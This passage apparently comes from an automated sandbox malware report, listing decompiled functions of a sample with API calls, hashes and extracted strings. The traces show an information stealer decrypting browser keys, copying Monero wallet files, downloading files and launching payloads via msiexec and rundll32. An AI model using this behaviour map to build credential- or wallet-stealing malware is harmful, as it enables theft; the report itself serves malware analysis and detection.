                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID: .exe
                                  • API String ID: 1395395982-4119554291
                                  • Opcode ID: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                  • Opcode Fuzzy Hash: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                  Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                  • Opcode Fuzzy Hash: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                  Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • strtok_s.MSVCRT ref: 00411307
                                  • strtok_s.MSVCRT ref: 00411750
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s$lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 348468850-0
                                  • Opcode ID: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                  • Opcode Fuzzy Hash: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                  Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                  • Opcode Fuzzy Hash: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                  Function 022F44E7 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 022F4505
                                  • memset.MSVCRT ref: 022F451C
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F4553
                                  • lstrcat.KERNEL32(?,0064A30C), ref: 022F4572
                                  • lstrcat.KERNEL32(?,?), ref: 022F4586
                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 022F459A
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022F8FF7: GetFileAttributesA.KERNEL32(00000000,?,022E1DBB,?,?,0042565C,?,?,00420E1F), ref: 022F9006
                                    • Part of subcall function 022E9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022E9FA0
                                    • Part of subcall function 022E9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022E9FF9
                                    • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                    • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                    • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                    • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                    • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                    • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                    • Part of subcall function 022F9627: GlobalAlloc.KERNEL32(00000000,022F4644,022F4644), ref: 022F963A
                                  • StrStrA.SHLWAPI(?,0064A0D8), ref: 022F465A
                                  • GlobalFree.KERNEL32(?), ref: 022F4779
                                    • Part of subcall function 022E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D56
                                    • Part of subcall function 022E9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022E5155,00000000,?), ref: 022E9D68
                                    • Part of subcall function 022E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D91
                                    • Part of subcall function 022E9D27: LocalFree.KERNEL32(?,?,?,?,022E5155,00000000,?), ref: 022E9DA6
                                    • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F470A
                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 022F4727
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 022F4739
                                  • lstrcat.KERNEL32(00000000,?), ref: 022F474C
                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 022F475B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 1191620704-0
                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                  • Instruction ID: 9909a654cbe1a59b1fc7ced73218e20d6a4779f1f8c9c5d7f42c70c81a1954ef
                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                  • Instruction Fuzzy Hash: E17174B6910218BBDB14FBE0DC45FEEB37AAF49300F4085A8E60996184EB75DB48CF51
                                  Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0041429E
                                  • memset.MSVCRT ref: 004142B5
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                  • lstrcatA.KERNEL32(?,0088A6C0), ref: 0041430B
                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                  • lstrcatA.KERNEL32(?,0088ABD0), ref: 00414333
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                  • StrStrA.SHLWAPI(?,0088BDC0), ref: 004143F3
                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 1191620704-0
                                  • Opcode ID: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                  • Opcode Fuzzy Hash: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                  Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00401327
                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                  • memset.MSVCRT ref: 00401516
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 1930502592-218353709
                                  • Opcode ID: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                  • Opcode Fuzzy Hash: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                  Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00406303
                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00406385
                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3532888709-1526165396
                                  • Opcode ID: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                  • Opcode Fuzzy Hash: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                  Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                  • StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00406147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID: a+A$a+A
                                  • API String ID: 4287319946-2847607090
                                  • Opcode ID: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                  • Opcode Fuzzy Hash: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                  Function 022F0CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • memset.MSVCRT ref: 022F0E83
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                  • lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                  • lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0EEF
                                  • lstrcat.KERNEL32(?,00420D84), ref: 022F0F01
                                  • lstrlen.KERNEL32(?), ref: 022F0F0E
                                  • memset.MSVCRT ref: 022F0F34
                                  • memset.MSVCRT ref: 022F0F48
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022F9948
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022F0FC1
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022F0FCD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID:
                                  • API String ID: 1395395982-0
                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
